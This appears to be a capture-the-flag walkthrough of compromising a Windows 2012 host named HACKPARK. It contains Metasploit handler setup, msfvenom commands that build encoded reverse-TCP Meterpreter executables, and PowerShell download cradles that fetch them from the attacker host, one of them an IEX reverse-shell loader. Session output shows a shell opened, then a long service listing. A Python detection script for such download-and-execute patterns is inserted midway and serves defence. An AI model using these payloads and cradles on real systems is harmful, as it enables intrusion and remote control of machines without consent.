13 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
14 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
15 exploit/windows/local/cve_2020_17136 2020-03-10 normal Yes CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP
16 exploit/windows/ftp/comsnd_ftpd_fmtstr 2012-06-08
196 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
197 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
198 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
199 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
200 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
201 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
202 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
203 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
204 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
205 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
206 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
207 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
208 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
209 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
210 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
211 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
212 payload/windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
213 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
214 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
215 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
216 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
217 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
218 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
219 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
220 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
221 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
253 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
254 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
255 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
256 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
257 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
258 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
259 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
260 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
261 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
262 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
263 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
264 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
265 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
Interact with a module by name or index. For example info 265, use 265 or use payload/windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD payload/windows/meterpreter_reverse_tcp
PAYLOAD => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LPORT 4445
LPORT => 4445
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST yes The listen address (an interface may be specified)
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.10.125.241
LHOST => 10.10.125.241
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 10.10.125.241 yes The listen address (an interface may be specified)
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
WE CREATE THE PAYLOAD WITH MSFVENOM:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.217.63 LPORT=4444 -f exe -o shell-paimon.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.125.241 LPORT=4445 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
WE TRY THIS ONE:
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.125.241 LPORT=4445 -e x86/shikata_ga_nai -f exe -o shellpaimon.exe
PAYLOAD CREATION, ATTEMPT 1:
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.125.241 LPORT=4445 -e x86/shikata_ga_nai -f exe -o shellpaimon.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 175715 (iteration=0)
x86/shikata_ga_nai chosen with final size 175715
Payload size: 175715 bytes
Final size of exe file: 250880 bytes
Saved as: shellpaimon.exe
----------
DRAFT, IGNORE:
METERPRETER:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.143.22:8081/shell-paimon.exe','shell-paimon.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.125.241:8081/shellpaimon.exe','shellpaimon.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.123.234:8081/shellpaimonX.exe','shellpaimonX.exe')"
WE RUN THE FILE:
Start-Process "shellpaimon.exe"
println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.143.22:8081/Invoke-PowerShellTcp.ps1\');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.143.22 -Port 443".execute().text
DRAFT
----------
WE TRANSFER THE FILE:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.125.241:8081/shellpaimon.exe','shellpaimon.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.82.143:8081/shellpaimon.exe','shellpaimon.exe')"
WE RUN IT:
Start-Process "shellpaimon.exe"
THIS ONE WORKED: IT RAN AND GAVE US THE METERPRETER SHELL IN METASPLOIT:
.\shellpaimon.exe
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.125.241:4445
[*] Meterpreter session 1 opened (10.10.125.241:4445 -> 10.10.118.10:49407) at 2024-01-26 02:09:25 +0000
meterpreter > sysinfo
Computer : HACKPARK
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
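The transfer-and-execute sequence above (a PowerShell WebClient download cradle, then a payload launched from a temp directory under the IIS application-pool identity) leaves a characteristic trail in process-creation telemetry. The following is an added detection example, not part of the original writeup: it runs three simple rules over process-creation events modelled on Sysmon Event ID 1 / Security 4688 fields. The events, the IP 10.0.0.5 and the user CORP\alice are constructed for the example.

```python
"""Detection rules for the staging pattern seen above: a PowerShell
download cradle, a shell spawned by the IIS worker, and an executable
launched from a world-writable staging directory.  Added example, runs
over constructed events (not page data)."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # image name of the parent process
    user: str           # account the new process runs as
    image: str          # full path of the new process
    command_line: str


# Download-cradle fragments; the page's own command used the first two.
CRADLE_RE = re.compile(
    r"New-Object\s+(?:System\.)?Net\.WebClient"
    r"|\.Download(?:File|String)\s*\("
    r"|\bIEX\b|Invoke-Expression",
    re.IGNORECASE,
)
WEB_WORKERS = {"w3wp.exe"}             # IIS worker process
APPPOOL_PREFIX = "iis apppool\\"       # identity the web shell ran as (see whoami above)
STAGING_DIRS = (
    "c:\\windows\\temp\\",
    "c:\\users\\public\\",
    "c:\\programdata\\",
    "c:\\windows\\tasks\\",
)
SHELLS = ("\\cmd.exe", "\\powershell.exe")


def classify(ev: ProcessEvent) -> list:
    """Return the names of the rules that fire for one event (maybe empty)."""
    hits = []
    if CRADLE_RE.search(ev.command_line):
        hits.append("powershell_download_cradle")
    # Anything descended from the web server, either directly (parent w3wp.exe)
    # or by identity (still running as the app-pool account), is suspicious
    # when it turns into a shell or runs a binary out of a staging directory.
    from_web = (ev.parent_image.lower() in WEB_WORKERS
                or ev.user.lower().startswith(APPPOOL_PREFIX))
    image = ev.image.lower()
    if from_web and image.endswith(SHELLS):
        hits.append("webserver_spawned_shell")
    if from_web and image.startswith(STAGING_DIRS):
        hits.append("exec_from_staging_dir")
    return hits


def scan(events) -> dict:
    """Map event index -> rule names for every event that fired at least once."""
    flagged = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            flagged[i] = hits
    return flagged


# Constructed sample events (not from the page).  10.0.0.5 and CORP\alice are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("w3wp.exe", "IIS APPPOOL\\blog",
                 "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("cmd.exe", "IIS APPPOOL\\blog",
                 "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell \"(New-Object System.Net.WebClient).Downloadfile("
                 "'http://10.0.0.5:8081/shellpaimon.exe','shellpaimon.exe')\""),
    ProcessEvent("cmd.exe", "IIS APPPOOL\\blog",
                 "C:\\Windows\\Temp\\shellpaimon.exe", ".\\shellpaimon.exe"),
    ProcessEvent("services.exe", "NT AUTHORITY\\SYSTEM",
                 "C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent("explorer.exe", "CORP\\alice",
                 "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell Get-Process"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, hits)
```

The first three constructed events reproduce the sequence from the writeup and each trips a rule; the last two are ordinary system and user activity and stay quiet. In a real pipeline the same three rules would be fed from Sysmon or 4688 events with command-line auditing enabled.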
WE MANUALLY LIST THE SERVICES THAT ARE RUNNING:
C:\Windows\Temp>sc query
SERVICE_NAME: AeLookupSvc
DISPLAY_NAME: Application Experience
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: AmazonSSMAgent
DISPLAY_NAME: Amazon SSM Agent
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: AppHostSvc
DISPLAY_NAME: Application Host Helper Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: AWSLiteAgent
DISPLAY_NAME: AWS Lite Guest Agent
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: BFE
DISPLAY_NAME: Base Filtering Engine
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: BrokerInfrastructure
DISPLAY_NAME: Background Tasks Infrastructure Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: CertPropSvc
DISPLAY_NAME: Certificate Propagation
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: CryptSvc
DISPLAY_NAME: Cryptographic Services
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: DcomLaunch
DISPLAY_NAME: DCOM Server Process Launcher
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Dhcp
DISPLAY_NAME: DHCP Client
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Dnscache
DISPLAY_NAME: DNS Client
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: DPS
DISPLAY_NAME: Diagnostic Policy Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: DsmSvc
DISPLAY_NAME: Device Setup Manager
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Ec2Config
DISPLAY_NAME: Ec2Config
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: EventLog
DISPLAY_NAME: Windows Event Log
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: EventSystem
DISPLAY_NAME: COM+ Event System
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: FontCache
DISPLAY_NAME: Windows Font Cache Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: gpsvc
DISPLAY_NAME: Group Policy Client
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: iphlpsvc
DISPLAY_NAME: IP Helper
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: LanmanServer
DISPLAY_NAME: Server
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: LanmanWorkstation
DISPLAY_NAME: Workstation
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: lmhosts
DISPLAY_NAME: TCP/IP NetBIOS Helper
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: LSM
DISPLAY_NAME: Local Session Manager
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: MpsSvc
DISPLAY_NAME: Windows Firewall
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: MSDTC
DISPLAY_NAME: Distributed Transaction Coordinator
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: netprofm
DISPLAY_NAME: Network List Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: NlaSvc
DISPLAY_NAME: Network Location Awareness
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: nsi
DISPLAY_NAME: Network Store Interface Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: PlugPlay
DISPLAY_NAME: Plug and Play
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Power
DISPLAY_NAME: Power
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: ProfSvc
DISPLAY_NAME: User Profile Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: RpcEptMapper
DISPLAY_NAME: RPC Endpoint Mapper
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: RpcSs
DISPLAY_NAME: Remote Procedure Call (RPC)
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SamSs
DISPLAY_NAME: Security Accounts Manager
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Schedule
DISPLAY_NAME: Task Scheduler
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SENS
DISPLAY_NAME: System Event Notification Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SessionEnv
DISPLAY_NAME: Remote Desktop Configuration
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: ShellHWDetection
DISPLAY_NAME: Shell Hardware Detection
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Spooler
DISPLAY_NAME: Print Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SystemEventsBroker
DISPLAY_NAME: System Events Broker
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: TermService
DISPLAY_NAME: Remote Desktop Services
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Themes
DISPLAY_NAME: Themes
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: TrkWks
DISPLAY_NAME: Distributed Link Tracking Client
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: UALSVC
DISPLAY_NAME: User Access Logging Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: UmRdpService
DISPLAY_NAME: Remote Desktop Services UserMode Port Redirector
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
